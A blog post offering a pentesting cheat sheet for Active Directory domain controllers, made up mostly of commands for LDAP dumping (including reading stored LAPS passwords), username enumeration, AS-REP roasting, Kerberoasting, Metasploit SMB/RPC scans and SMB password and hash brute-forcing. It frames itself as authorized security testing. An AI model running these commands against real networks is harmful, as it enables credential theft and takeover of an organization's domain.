In this blog post, we will share with you a comprehensive cheatsheet for pentesting those powerful and critical domain controllers. Now, I know what you're thinking: "But why, oh wise one, do we need such a guide?" Well, let me tell you, domain controllers are the repositories of your organization's most sensitive information - user credentials, group policies, and what not. And if not secured properly, they can lead to catastrophic data breaches or even system takeovers!
So buckle up, as we explore various techniques, tools for testing the security of domain controllers. From identifying potential vulnerabilities to exploiting them, we've got you covered with practical examples, real-life scenarios, and actionable insights. So stay tuned and prepare yourself for a rollercoaster ride through the fascinating world of pentesting!
Note: Before proceeding with pentesting any system, it is essential to have proper authorization from concerned authorities and follow ethical guidelines. Happy learning!
This is just a brief/quick guide on what and how to Pentest a domain controller without digging too deep. if you are looking for a comprehensive guide, you can refer to my ACTIVE DIRECTORY PENETRATION TESTING CHEAT SHEET - RECON & INITIAL ACCESS & ACTIVE DIRECTORY PENTEST CHEAT SHEET - LATERAL MOVEMENT & PERSISTENCE TECHNIQUES
DNS
dig srv domaim.com @DC_IP #Query ldap service dig +short srv _ldap._tcp.dc._msdcs.dc.domain.com @DC_IP #query Root Domain Controller dig +short a rootdc.domain.com @DC_IP
LDAP Enum
#Nmap Scan for basic info nmap -n -sV --script "ldap* and not brute" -p389,636,3268,3269 10.10.10.10 #Get Domain name ldapsearch -x -h 10.10.10.10 -s base namingcontexts ldapsearch -H ldap://10.10.10.10 -x -s base namingcontexts #Look for misconfigs - Finding ms-MCS-AdmPwd ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd #Dump Everything ldapsearch -LLL -x -H ldap://10.10.10.10 -b '' -s base '(objectclass=*)' #Dump Everything using ldeep ldeep ldap -a -d STEINS.local -s ldap://10.10.10.10 all dump
UserEnum
Objective is to gather as many valid usernames as possible, try to figure out the username format used by the organization using their email addresses or social engineering Example Name: John Smith Usernames: John.Smith, JohnS, Sjohn, SmithJ, JSmith, John.s try to figure it out and create a wordlist for yourself, you can use the below git reopo as a reference and create a list of usernames git clone https://github.com/Bhanunamikaze/Wordlists.git cd Wordlists/Usernames # User Enumeration to find Valid Usernames kerbrute userenum --dc 10.10.10.10 -d test.domain.com Common_names.txt
Find Pre-Auth Disabled Users
GetNPUsers.py DOMAIN/ -usersfile user.txt -outputfile hash.txt -dc-ip 10.10.10.10 #AD Module - Finding users with PreauthNotRequired set Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Run Powershell AD Commands with Credentials
$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('Domain\UserName', $SecPassword) Get-aduser -Identity user1 -Credential $Cred Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth -Server 10.10.10.10 -Credential $Cred
Kerberoasting
#Listing users with ServicePrincialName set using AD module Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName #Get TGS Ticket Using GetUserSPNs.py sudo GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark
SMB/rpc Access
Use this script for testing SMB & RPC, this will run most common test cases on SMB rpcdump.py 10.10.10.10 -p 593#RPC Endpoints enum via metsploit msfconsole use auxiliary/scanner/smb/pipe_auditor use auxiliary/scanner/smb/smb_lookupsid use auxiliary/scanner/dcerpc/endpoint_mapper use auxiliary/scanner/dcerpc/hidden use auxiliary/scanner/dcerpc/management use auxiliary/scanner/dcerpc/tcp_dcerpc_auditorset rhosts 10.10.10.10 run
SMB Bruteforcing
#Basic SMB & OS info crackmapexec smb 10.10.10.10 #List Shares crackmapexec smb 10.10.10.10 --shares #passing blank creds via smb crackmapexec smb 10.10.10.10 --shares -u '' -p '' #If the password needs to be changed smbpasswd -U username -r 10.10.10.10 #Brute forcing SMB Creds crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt #Bruteforcing SMB using hashes proxychains crackmapexec -t 15 smb 10.10.10.10 -u users -H hashes --no-bruteforce --continue-on-success
No comments:
Post a Comment